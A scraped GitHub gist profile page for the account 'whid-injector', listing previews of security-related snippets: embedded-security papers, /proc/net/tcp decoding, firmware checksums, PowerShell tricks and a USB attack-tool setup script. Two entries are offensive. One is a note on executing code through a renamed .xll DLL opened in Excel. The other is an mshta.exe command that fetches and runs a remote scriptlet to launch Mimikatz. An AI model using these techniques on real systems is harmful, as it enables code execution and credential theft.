Skip to content

Instantly share code, notes, and snippets.

View whid-injector's full-sized avatar

WHID: We Hack In Disguise whid-injector

View GitHub Profile
@whid-injector
whid-injector / imperfect-design.md
Created March 16, 2021 20:19 — forked from dev-zzo/imperfect-design.md
A curated list of research papers on embedded security, keyed by the device p/n
@whid-injector
whid-injector / proc_net_tcp_decode
Created January 8, 2021 22:19 — forked from jkstill/proc_net_tcp_decode
decode entries in /proc/net/tcp
Decoding the data in /proc/net/tcp:
Linux 5.x /proc/net/tcp
Linux 6.x /proc/PID/net/tcp
Given a socket:
$ ls -l /proc/24784/fd/11
lrwx------ 1 jkstill dba 64 Dec 4 16:22 /proc/24784/fd/11 -> socket:[15907701]
@whid-injector
whid-injector / sha256sum.txt
Created January 26, 2018 18:12 — forked from PyYoshi/sha256sum.txt
GPD Pocket--firmware of Windows OS(20170526).rar
87a1f231fa93a45db5b3b8fd36780ff2cd5857de77bb4c0d580366e599b1a817 GPD Pocket--firmware of Windows OS(20170526).rar
800635981f43f4efabf84e1988f4dbca89b2eda0400718647ef8904e595170b6 ./WINPE/BOOTEX.LOG
21bf8054adfe0614baba6f21a4bad0b7bfe71dbe9169d2422de42a79258beba0 ./WINPE/Boot/BCD
8358dd2d0dc148113181718daee0b916e6e37ea7d94afd06ee153086da1ce478 ./WINPE/Boot/Fonts/chs_boot.ttf
9be3453a0ccd14f3ae1fc766727909b22b51f561d9a5cd0338e8ad41b2be5737 ./WINPE/Boot/Fonts/cht_boot.ttf
89470defffa753a6d3fcff4db243ec211d9970ae67f1f840034fe9199020db1c ./WINPE/Boot/Fonts/jpn_boot.ttf
6a21388fc2c5fda2cd7d08ffa0ce01dc6c65e08fcb030a3d3aaa39c31b1c398a ./WINPE/Boot/Fonts/kor_boot.ttf
6846bcd60c75f991dc009f6c0dad10ce2016cb00acc9d208abd596fb2e6bd7d0 ./WINPE/Boot/Fonts/malgun_boot.ttf
458f90f9e99e25b8777b3e4ba872f822ee074668814d52d454f3597af2fc8680 ./WINPE/Boot/Fonts/malgunn_boot.ttf
ec653bdee02143ef49f28ef932bb31ab9c6d6a431c8d8f244ce44a7f7ad03e66 ./WINPE/Boot/Fonts/meiryo_boot.ttf

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

@whid-injector
whid-injector / mimikatz.sct
Created January 18, 2018 14:17
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@whid-injector
whid-injector / HuddledTricks.psm1
Created November 21, 2017 10:48 — forked from Jaykul/HuddledTricks.psm1
Stupid PowerShell Tricks
#Requires -version 2.0
## Stupid PowerShell Tricks
###################################################################################################
add-type @"
using System;
using System.Runtime.InteropServices;
public class Tricks {
[DllImport("user32.dll")]
private static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
@whid-injector
whid-injector / USaBUSe-install.sh
Created April 30, 2017 08:36 — forked from singe/USaBUSe-install.sh
Setting up a new binary-only USaBUSe install on a new macOS
brew install avrdude wget
pip install pyserial
git clone --recursive https://github.com/sensepost/USaBUSe
cd USaBUSe
wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046"
unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip
mkdir esp-vnc/firmware